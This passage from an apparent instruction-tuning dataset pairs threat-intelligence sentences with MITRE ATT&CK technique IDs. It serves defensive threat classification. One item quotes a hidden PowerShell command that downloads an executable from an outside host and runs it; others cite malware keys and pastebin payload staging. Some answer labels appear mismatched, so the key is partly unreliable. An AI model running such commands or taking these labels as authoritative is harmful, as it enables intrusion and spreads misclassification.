Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Higaisa has called various native OS APIs.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Group has added persistence by registering the file name for the next stage malware under HKCU\Environment\UserInitMprLogonScript.### Assistant: T1037: Boot or Logon Initialization Scripts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may tunnel network communications to and from a victim system within a separate protocol to avoid detection/network filtering and/or enable access to otherwise unreachable systems.### Assistant: T1572: Protocol Tunneling" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 has used a variety of utilities, including WinRAR, to archive collected data with password protection.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DCOM can also execute macros in existing documents and may also invoke Dynamic Data Exchange execution directly through a COM created instance of a Microsoft Office application, bypassing the need for a malicious document.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,1/12/14 3/5/14 127.0.0.1 N/A 3/5/14 3/31/14 103.24.0.142 Hong Kong 3/31/14 10/27/14 103.24.1.54 Hong Kong 10/27/14 11/9/14 127.0.0.1 N/A 11/9/14 5/25/15 127.0.0.3 N/A 5/25/15 Current as of this publication 127.0.0.1 N/A Table 5### Assistant: T1571: Non-Standard Port" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cobalt Group has executed JavaScript scriptlets on the victim's machine.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Offset Description 0x0 Victim GUID (8C8CEED9-4326-448B-919E-249EEC0238A3) 0x25 Victim IP Address (192.168.180.154) 0x45 Command (0x66660001) 0x49 Length of payload (0x2f – 47) 0x4d Field 1 – Windows major version (0x6 – Windows Vista+) 0x51 Field 2 – Windows minor version (0x1 – Windows 7) 0x55 Field 3 – Unknown (0x20) 0x59 Payload (default flag:4/2/2018 1:01:33 AM) Table 5 – Beacon structure for PLAINTEE### Assistant: T1010: Application Window Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Domain trusts allow the users of the trusted domain to access resources in the trusting domain.### Assistant: T1482: Domain Trust Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Siloscape also writes both an archive of Tor and the unzip binary to disk from data embedded within the payload using Visual Studio’s Resource Manager.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,menuPass stages data prior to exfiltration in multi-part archives, often saved in the Recycle Bin.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 added their own devices as allowed IDs for active sync using Set-CASMailbox, allowing it to obtain copies of victim mailboxes.### Assistant: T1098: Account Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Much like the original payload, this tool uses if/else statements to skip the legitimate code in the Saransh Email System source to run the malicious functions, which have the same method names as the original tool and follow the same call sequence: Form1.Speed Form1.diomadnfagaghagh Form1.fjcsERIfjfiojsGHIsdifjksi Form1.gsgjIDJIGJIGJIGJIFDOSpl Form1.FJaioefgkaoeK This chain of functions eventually loads a resource named ‘GSrdofjksrgj’, which the tool decrypts using the same algorithm and key as in the initial payload:byte[] array4 = new byte[] { 19, 129, 43, 37, 56, 65, 255, 75, 111, 19, 211, 120, 0, 49, 126, 248 };The decrypted payload has a SHA256 hash of 5e805a88294f6d25d55103d19d13e798e01ad70e6b89e9c58db5d468cc63b3d5, which is a variant of the NanoCore remote administration tool### Assistant: T1569: System Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework., Python### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Scans may range from simple pings to more nuanced scans that may reveal host software/versions via server banners or other network artifacts.### Assistant: T1595: Active Scanning" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Aria-body has used an encrypted configuration file for its loader.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FlawedAmmyy will attempt to detect if a usable smart card is current inserted into a card reader.### Assistant: T1120: Peripheral Device Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 has used valid accounts, including administrator accounts, to help facilitate lateral movement on compromised networks.### Assistant: T1078: Valid Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,AppleJeus has decoded files received from a C2.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,QakBot can use net localgroup to enable discovery of local groups.### Assistant: T1069: Permission Groups Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Those infected systems may opt to send the output from those commands back over a different C2 channel, including to another distinct Web service.### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Compromised credentials or access may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop.### Assistant: T1556: Modify Authentication Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,For Windows Vista or higher, the path would appear as C:\Users\Public.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Raindrop was built to include a modified version of 7-Zip source code and Far Manager source code.### Assistant: T1036: Masquerading" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Operation Wocao has deleted Windows Event Logs to hinder forensic investigation.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BLUELIGHT can uninstall itself.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Figure 1 Article referenced by decoy document in attack against British government agency   The attached document leverages a DDE exploit to ultimately execute the following code:c:\\windows\\system32\\cmd.exe ""/k PowerShell.exe -ExecutionPolicy bypass -windowstyle hidden -noprofile -command (New-Object System.Net.WebClient).DownloadFile('https://881.000webhostapp[.]com/0_31.doc', '%TEMP%\\AAA.exe');Start-Process('%TEMP%\\AAA.exe')Palo Alto Networks first witnessed this DDE exploit technique in May 2017, and attackers continue to leverage it### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OSX_OCEANLOTUS.D has a variant that is packed with UPX.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NETWIRE can discover and close windows on controlled systems.### Assistant: T1010: Application Window Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SoreFang can decode and decrypt exfiltrated data sent to C2.### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These configuration scripts run at the permission level of their directory and are often used to set environment variables, create aliases, and customize the user’s environment.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TeamTNT uses malware that adds cryptocurrency miners as a service.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ROKRAT has a audio capture and eavesdropping module.### Assistant: T1123: Audio Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,One implementation would be to store a file system in reserved disk space unused by disk structures or standard file system partitions.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This can allow an adversary access to other containerized resources from the host level or to the host itself.### Assistant: T1611: Escape to Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Root certificates are used in public key cryptography to identify a root certificate authority .### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MuddyWater can disable the system's local proxy settings.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse the Microsoft Office ""Office Test"" Registry key to obtain persistence on a compromised system.### Assistant: T1137: Office Application Startup" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This means that “ ls” will not be saved, but “ls” would be saved by history.### Assistant: T1562: Impair Defenses" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sibot executes commands using VBScript.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 obtained Ticket Granting Service tickets for Active Directory Service Principle Names to crack offline.### Assistant: T1558: Steal or Forge Kerberos Tickets" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Windigo has also used multiple reverse proxy chains as part of their C2 infrastructure.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,With access to the credential hash, an adversary can perform off-line Brute Force cracking to gain access to plaintext credentials.### Assistant: T1187: Forced Authentication" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HotCroissant can retrieve a list of applications from the SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths registry key.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The group has used an exploit toolkit known as Threadkit that launches .bat files.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Psylo exfiltrates data to its C2 server over the same protocol as C2 communications.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,AppleSeed can identify the IP of a targeted system.### Assistant: T1016: System Network Configuration Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary may also Create Cloud Instance and later terminate the instance after achieving their objectives.### Assistant: T1578: Modify Cloud Compute Infrastructure" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BlackEnergy 2 contains a ""Destroy"" plug-in that destroys data stored on victim hard drives by overwriting file contents.### Assistant: T1485: Data Destruction" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GOLD SOUTHFIELD has used publicly-accessible RDP and remote management and monitoring servers to gain access to victim machines.### Assistant: T1133: External Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MoonWind uses batch scripts for various purposes, including to restart and uninstall itself.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Commands and files would be relayed from the disconnected system to the Internet-connected system to which the adversary has direct access.### Assistant: T1092: Communication Through Removable Media" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It is highly likely the adversary then used spear-phishing attacks containing links to these malicious documents as a delivery mechanism### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,TajMahal has the ability to identify the Internet Explorer version on an infected host.### Assistant: T1518: Software Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Many services are set to run at boot, which can aid in achieving persistence , but adversaries can also abuse services for one-time or temporary execution.### Assistant: T1569: System Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dridex has used the OutputDebugStringW function to avoid malware analysis as part of its anti-debugging technique.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sakula uses HTTP for C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,QakBot can use Regsvr32 to execute malicious DLLs.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PowerDuke achieves persistence by using various Registry Run keys.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,ThiefQuest hides a copy of itself in the user's ~/Library directory by using a . at the beginning of the file name followed by 9 random characters.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT3 has sent spearphishing emails containing malicious links.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cuba can use the function GetIpNetTable to recover the last connections to the victim's machine.### Assistant: T1049: System Network Connections Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework., OLE object ### Assistant: T1559: Inter-Process Communication" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Prikormka uses DLL search order hijacking for persistence by saving itself as ntshrui.dll to the Windows directory so it will load before the legitimate ntshrui.dll saved in the System32 subdirectory.### Assistant: T1574: Hijack Execution Flow" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LANS Deletes the file created by the LAN command to reverse the effect### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BLACKCOFFEE uses Microsoft’s TechNet Web portal to obtain an encoded tag containing the IP address of a command and control server and then communicates separately with that IP address for C2.### Assistant: T1104: Multi-Stage Channels" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bazar can enumerate remote systems using Net View.### Assistant: T1018: Remote System Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Python comes with many built-in packages to interact with the underlying system, such as file operations and device I/O.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Timers installed using privileged paths may be used to maintain root level persistence.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,REvil has been distributed via malicious e-mail attachments including MS Word Documents.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Wizard Spider has installed TrickBot as a service named ControlServiceA in order to establish persistence.### Assistant: T1543: Create or Modify System Process" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Account credentials gathered by adversaries may be those directly associated with the target victim organization or attempt to take advantage of the tendency for users to use the same passwords across personal and business accounts.### Assistant: T1589: Gather Victim Identity Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,A version of XTunnel introduced in July 2015 obfuscated the binary using opaque predicates and other techniques in a likely attempt to obfuscate it and bypass security products.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may schedule data exfiltration to be performed only at certain times of day or at certain intervals.### Assistant: T1029: Scheduled Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,jRAT payloads have been packed.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kimsuky has used a modified TeamViewer client as a command and control channel.### Assistant: T1219: Remote Access Software" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,This behavior is typical in enterprise environments so that users do not need to enter credentials to access network resources.### Assistant: T1187: Forced Authentication" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Net Crawler uses credential dumpers such as Mimikatz and Windows Credential Editor to extract cached credentials from Windows systems.### Assistant: T1003: OS Credential Dumping" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,China Chopper's server component can upload local files.### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The write can be performed with native Windows API calls such as VirtualAllocEx and WriteProcessMemory, then invoked with CreateRemoteThread .### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,messengers.### Assistant: T1001: Data Obfuscation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Wizard Spider has used macros to execute PowerShell scripts to download malware on victim's machines.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CDNs allow an organization to host content from a distributed, load balanced array of servers.### Assistant: T1596: Search Open Technical Databases" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RainyDay can use the QuarksPwDump tool to obtain local passwords and domain cached credentials.### Assistant: T1555: Credentials from Password Stores" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,PE injection is commonly performed by copying code into the virtual address space of the target process before invoking it via a new thread.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT29 used sticky-keys to obtain unauthenticated, privileged console access.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bisonal can retrieve a file list of a specified folder.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InnaputRAT uses the API call ShellExecuteW for execution.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,After decrypting the strings, they must be further decompressed using LZNT1### Assistant: T1140: Deobfuscate/Decode Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Tropic Trooper has monitored files' modified time.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RogueRobin created a shortcut in the Windows startup folder to launch a PowerShell script each time the user logs in to establish persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Authentication cookies are commonly used in web applications, including cloud-based services, after a user has authenticated to the service so credentials are not passed and re-authentication does not need to occur as frequently.### Assistant: T1550: Use Alternate Authentication Material" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Cryptoistic has the ability delete files from a compromised host.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,If an adversary is able to access the database and key, the credential cache Kerberos blob can be extracted and converted into a usable Kerberos ccache file that adversaries may use for Pass the Ticket.### Assistant: T1558: Steal or Forge Kerberos Tickets" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse SQL stored procedures to establish persistent access to systems.### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Ixeshe can list file and directory information.### Assistant: T1083: File and Directory Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,gh0st RAT has used Zlib to compress C2 communications data before encrypting it.### Assistant: T1132: Data Encoding" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The victim will then see a prompt to Enable Content as with any malicious macro document as seen in Figure 5### Assistant: T1204: User Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Information about victims may be available in online databases and repositories, such as registrations of domains/certificates as well as public collections of network data/artifacts gathered from traffic and/or scans.### Assistant: T1596: Search Open Technical Databases" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Evilnum has deleted files used during infection.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BitPaymer can use the RegEnumKeyW to iterate through Registry keys.### Assistant: T1012: Query Registry" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,GOLD SOUTHFIELD has used the remote monitoring and management tool ConnectWise to obtain screen captures from victim's machines.### Assistant: T1113: Screen Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MMC can also be used to open Microsoft created .msc files to manage system configuration.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,These token can then be applied to an existing process Token Impersonation/Theft or used to spawn a new process Create Process with Token.### Assistant: T1134: Access Token Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,menuPass has compressed files before exfiltration using TAR and RAR.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Valak has been delivered via malicious links in e-mail.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,InvisiMole can function as a proxy to create a server that relays communication between the client and C&C server, or between two clients.### Assistant: T1090: Proxy" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bad Rabbit used the EternalRomance SMB exploit to spread through victim networks.### Assistant: T1210: Exploitation of Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,FALLCHILL encrypts C2 data with RC4 encryption.### Assistant: T1573: Encrypted Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Helminth creates folders to store output from batch scripts prior to sending the information to its C2 server.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries.### Assistant: T1027: Obfuscated Files or Information" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Revenge RAT schedules tasks to run malicious scripts at different intervals.### Assistant: T1053: Scheduled Task/Job" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Typically, management services over commonly used ports are used when guessing passwords.### Assistant: T1110: Brute Force" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Carbanak exfiltrates data in compressed chunks if a message is larger than 4096 bytes .### Assistant: T1030: Data Transfer Size Limits" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Sys10 collects the computer name, OS versioning information, and OS install date and sends the information to the C2.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary may attempt to discover resources that are available within an infrastructure-as-a-service environment.### Assistant: T1580: Cloud Infrastructure Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The weakness in the system can be a bug, a glitch, or a design vulnerability.### Assistant: T1190: Exploit Public-Facing Application" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,njRAT has a module for performing remote desktop access.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Leviathan has targeted RDP credentials and used it to move through the victim environment.### Assistant: T1021: Remote Services" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Naikon has modified a victim's Windows Run registry to establish persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser.### Assistant: T1218: Signed Binary Proxy Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,An adversary may do this when they have a specific, existing process they want to assign the new token to.### Assistant: T1134: Access Token Manipulation" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.### Assistant: T1203: Exploitation for Client Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,To complete its mission, APT39 typically archives stolen data with compression tools such as WinRAR or 7-Zip### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Remote Shell: The function above is seen throughout many of the binaries in the Mirage family and is executed when a command is sent from the C&C### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,RunningRAT contains code to compress files.### Assistant: T1560: Archive Collected Data" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Babuk can use ChaCha8 and ECDH to encrypt data.### Assistant: T1486: Data Encrypted for Impact" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WastedLocker has a command to take ownership of a file and reset the ACL permissions using the takeown.exe /F filepath command.### Assistant: T1222: File and Directory Permissions Modification" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,The Get-MsolRoleMember PowerShell cmdlet can be used to obtain account names given a role or permissions group in Office 365.### Assistant: T1087: Account Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may setup email forwarding rules to collect sensitive information.### Assistant: T1114: Email Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,It also creates a folder at C:\Users\\AppData\Roaming\Microsoft\store to store screenshot JPEG files.### Assistant: T1074: Data Staged" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,POWERSOURCE has been observed being used to download TEXTMATE and the Cobalt Strike Beacon payload onto victims.### Assistant: T1105: Ingress Tool Transfer" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Access to a third-party network-wide or enterprise-wide software system may enable an adversary to have remote code execution on all systems that are connected to such a system.### Assistant: T1072: Software Deployment Tools" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,CHOPSTICK is capable of performing remote command execution.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,net group ### Assistant: T1069: Permission Groups Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,In some cases, the encoded PowerShell commands were used to download and execute content hosted on the paste site hxxps://pastebin[.]com### Assistant: T1102: Web Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT28 has used the WindowStyle parameter to conceal PowerShell windows.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,NETEAGLE is capable of reading files over the C2 channel.### Assistant: T1041: Exfiltration Over C2 Channel" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Exaramel for Linux can execute commands with high privileges via a specific binary with setuid functionality.### Assistant: T1548: Abuse Elevation Control Mechanism" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Gorgon Group malware can leverage the Windows API call, CreateProcessA, for execution.### Assistant: T1106: Native API" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,WINDSHIELD C2 traffic can communicate via TCP raw sockets.### Assistant: T1095: Non-Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,More sophisticated samples may perform multiple process injections to segment modules and further evade detection, utilizing named pipes or other inter-process communication mechanisms as a communication channel.### Assistant: T1055: Process Injection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,SMOKEDHAM can continuously capture keystrokes.### Assistant: T1056: Input Capture" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HTTPBrowser is capable of spawning a reverse shell on a victim.### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Often, these devices are equipped with special, dedicated encryption hardware to greatly increase the speed of the encryption process as well as to prevent malicious tampering.### Assistant: T1600: Weaken Encryption" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Dragonfly identified and browsed file servers on the victim network, viewing files pertaining to ICS or Supervisory Control and Data Acquisition systems.### Assistant: T1135: Network Share Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,More_eggs has the capability to gather the username from the victim's machine.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries can create accounts that can be used to build a persona to further operations.### Assistant: T1585: Establish Accounts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Higaisa has sent spearphishing emails containing malicious attachments.### Assistant: T1566: Phishing" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Honeybee uses a batch file that configures the ComSysApp service to autostart in order to establish persistence.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Kobalos can modify timestamps of replaced files, such as ssh with the added credential stealer or sshd used to deploy Kobalos.### Assistant: T1070: Indicator Removal on Host" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may abuse container files such as compressed/archive and/or disk image file formats to deliver malicious payloads that may not be tagged with MOTW.### Assistant: T1553: Subvert Trust Controls" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries can use this to their advantage to hide files and folders anywhere on the system and evading a typical user or system analysis that does not incorporate investigation of hidden files.### Assistant: T1564: Hide Artifacts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT18 establishes persistence via the HKCU\Software\Microsoft\Windows\CurrentVersion\Run key.### Assistant: T1547: Boot or Logon Autostart Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,LightNeuron collects Exchange emails matching rules specified in its configuration.### Assistant: T1114: Email Collection" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,OAuth is one commonly implemented framework that issues tokens to users for access to systems.### Assistant: T1550: Use Alternate Authentication Material" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,HiddenWasp installs reboot persistence by adding itself to /etc/rc.local.### Assistant: T1037: Boot or Logon Initialization Scripts" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries can weaken the encryption software on a compromised network device by reducing the key size used by the software to convert plaintext to ciphertext .### Assistant: T1600: Weaken Encryption" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Executing browser-based behaviors such as pivoting may require specific process permissions, such as SeDebugPrivilege and/or high-integrity/administrator rights.### Assistant: T1185: Browser Session Hijacking" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Wingbird checks the victim OS version after executing to determine where to drop files based on whether the victim is 32-bit or 64-bit.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,MiniDuke uses Google Search to identify C2 servers if its primary C2 method via Twitter is not working.### Assistant: T1008: Fallback Channels" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Crimson can identify the user on a targeted system.### Assistant: T1033: System Owner/User Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,One example of this type of attack is known as a simple HTTP flood, where an adversary sends a large number of HTTP requests to a web server to overwhelm it and/or an application that runs on top of it.### Assistant: T1499: Endpoint Denial of Service" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,USBStealer automatically exfiltrates collected files via removable media when an infected device is connected to the second victim after receiving commands from the first victim.### Assistant: T1020: Automated Exfiltration" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,UserInstall.exe will abuse the BITSadmin command-line tool to create a job and launch sidebar.exe### Assistant: T1059: Command and Scripting Interpreter" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Target-specific values can be derived from specific network shares, physical devices, software/software versions, files, joined AD domains, system time, and local/external IP addresses.### Assistant: T1480: Execution Guardrails" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,IIS 7.0 introduced modules that provide the same unrestricted access to HTTP requests and responses as ISAPI extensions and filters.### Assistant: T1505: Server Software Component" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Bandook can collect local files from the system .### Assistant: T1005: Data from Local System" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,DownPaper collects the victim host name and serial number, and then sends the information to the C2 server.### Assistant: T1082: System Information Discovery" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,When a file is opened, the default program used to open the file is checked.### Assistant: T1546: Event Triggered Execution" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,Adversaries may also communicate with an already open port, but the service listening on that port will only respond to commands or trigger other malicious functionality if passed the appropriate magic value.### Assistant: T1205: Traffic Signaling" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,APT39 has used HTTP in communications with C2.### Assistant: T1071: Application Layer Protocol" "### Human:Find the techniques and ID from MITRE ATT&CK framework.,BackdoorDiplomacy has copied files of interest 